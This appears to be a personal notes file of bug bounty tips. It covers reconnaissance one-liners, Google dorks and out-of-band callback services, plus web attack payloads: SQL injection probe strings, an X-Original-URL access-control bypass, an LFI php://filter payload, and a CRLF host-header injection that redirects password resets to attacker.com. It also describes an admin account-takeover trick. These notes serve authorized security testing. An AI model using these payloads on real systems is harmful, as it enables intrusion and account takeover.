Bug_Bounty_tips

site.com/file.php
response = nothing

http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours, 
request a password reset. 
now, you are admin :)
this won't happen you think? It is, I did it ;)

you are not adding your email as admin email, you are adding admin's email to your app, changing his email with yours, then requesting pass change. admin's pass reset link is coming to you
-----------------------------------------------
subfinder -dL domains.txt -o subdomains.txt && subjack -w subdomains.txt |toslack 
recommended to use in vm
(subdomain takeover automation)
-------------------------------------------------------------------------------
Easy information disclosure:-
cat hosts.txt | httpx -path //server-status?full=true -status-code -content-length

cat hosts.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length
--------------------------------------------------------------------------------
Use the following DORK and try to do directory brute forcing if your target allows it. This will look for things you are not supposed to access that are behind a login page. 

inurl:login | inurl:signin | intitle:Login | intitle:"sign in" | inurl:auth
--------------------------------------------------------------------------------
Information disclosure:-
1. subfinder -d target. com | httprobe -c 100 > target.txt got around 210 subdomains.
2. cat target.txt | aquatone -out ~aquatone/target 
3. Checked every screenshot and found an interesting subdomain.
4. Tried for some low hanging bugs XSS, open redirect etc but nothing worked :(
5. Then I decided to brute force the directories, I used ffuf and one of  the wordlists from 
@DanielMiessler
 seclist.
 6. ffuf -w path/to/wordlist.txt -u https :// sub .target. com/FUZZ -mc all -c -v
7. And after some time got an endpoint which was exposing /debug/pprof which had a lot of sensitive info such as debug info, traces etc. ;)
8. Reported the issue to company and they quickly fixed it and acknowledged my work :) Reference:-http://link.medium.com/mym9UTLHQ9 and great ffuf guide by 
@codingo_
 https://youtu.be/iLFkxAmwXF0
 --------------------------------------------------------------------------------
 Useful services for Out of Band exploitation.
1. Burp Collaborator
2. https://webhook.site
3. https://requestcatcher.com
4. https://canarytokens.org/generate
5. http://dnsbin.zhack.ca
6. https://ngrok.com
-------------------------------------------------------------------
Google dorks for hunting

https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06
-------------------------------------------------------------------
crt.sh one liner 

curl -s https://crt.sh/\?q\=\%.target.com\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
-------------------------------------------------------------------
Jsscanner
https://github.com/dark-warlord14/JSScanner
----------------------------------------------------------------
https://www.notion.so/Subdomain-Enumaration-5109690b9db14b41b02b373af8234c93
subdomain enum full 
-----------------------------------------------------------------

https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/ (full info)

----------------------------------------------------------------------
GET /admin HTTP/1.1
Host: http://site.com
...
Access is denied

GET /test HTTP/1.1
Host: http://site.com
X-Original-URL: /admin

HTTP/1.1 200 OK
---------------------------------------------------------------------------

Looking for IDORs? Check this:- 

1. Keep an eye on every endpoint what data is passing through it.
2. If you create an account on the main domain, try to find subdomains with login functionality.
3. Use Burp search functionality a lot for keywords:)
4. If your sequential numbers are not working, try your UserId parameter along with the victim’s id in the request.
5. Once you upload the images, keep an eye of it if it generates a unique ID!
-------------------------------------------------------------------------
Tip, use confirm instead of alert ;) alert is probably the most filtered word out there for xss payload
------------------------------------------------------------------------
 Always check your target name directory on domain, like http://site.com/site/ or http://target.com/target/.
Got same thing on 2 subdomains of a target.
1st was leaking staff's PII info: got 3 digit bounty.
---------------------------------------------------------------------------------
2FA bypassing for bug bounties
1. Background concept about 2FA bypass
-With advent of account takeovers, Companies like Google, Facebook have implemented this feature on various sensitive pages where an attacker could get or modify data of a user without his intent. This Authentication method improves the security posture & provides a secure access to users. Using two-factor authentication prevents hackers or attackers from compromising your account even if your account credentials are leaked publicly or bypasses.
2. Impact of 2fa bypass
-ticket system takeover, unauthorized email verification bypass, account
3. Types of 2fa bypass request and response manipulation.
-In this we need people who are known to burpsuite and lil bit logical mindset
4. Security mis-configuration
Session hijacking, Subdomain to domain bypass, missing and broken links, input validation
----------------------------------------------------------------------------------------
~Dorker

https://dorks.faisalahmed.me
----------------------------------------------------------------------------------------
curl https://certspotter.com/api/v0/certs?domain=$1 | grep  -o '\[\".*\"\]'
curl http://index.commoncrawl.org/CC-MAIN-2018-22-index\?url\=\*.hackerone.com\&output\=json |jq .url 
curl http://web.archive.org/cdx/search/cdx/search/cds?url=*.cardpay.ntc.net.np/*&output=text&fl=original&collapse=urlkey
-----------------------------------------------------------------------------------------
1. Create an account email@burp_collab*
2. Forgot password
3. Received requests from internal server + SMTP connection details
4. Got Internal headers + origin IP
5. http://site.com/admin = (403)
6. http://site.com/admin = (Headers + Origin IP = pwn)
---------------------------------------------------------------------------------------------------
Looking for jira subdomains of your targets ? 

use this kinda dorks.
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
site:*.target.com file type:jspa
-----------------------------------------------------------------
Bug Bounty Tips
This is how to find sql-Injection 100% of the time
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=1-sleep()
/?q=1 and sleep()
/?q=")
/?q=')
/?q=-x()
----------------------------------------------------------------------------------
LFI to RCE Fire
Uploaded shell.php
Page=php://filter/convert.base64-encode/resource=shell.php
---------------------------------------------------------------------------------
wordlist for all fuzzing

https://wordlists.assetnote.io/
https://s3.amazonaws.com/assetnote-wordlists/data/automated/$filename.txt   (download)
---------------------------------------------------------------------------------
Host Hader based CRLF Injection

POST /resetPassword%0D%0AHost:http://attacker.com 
Host: http://test.com
[...] 
email=target@email.com
-------------------------------------------------------------------------------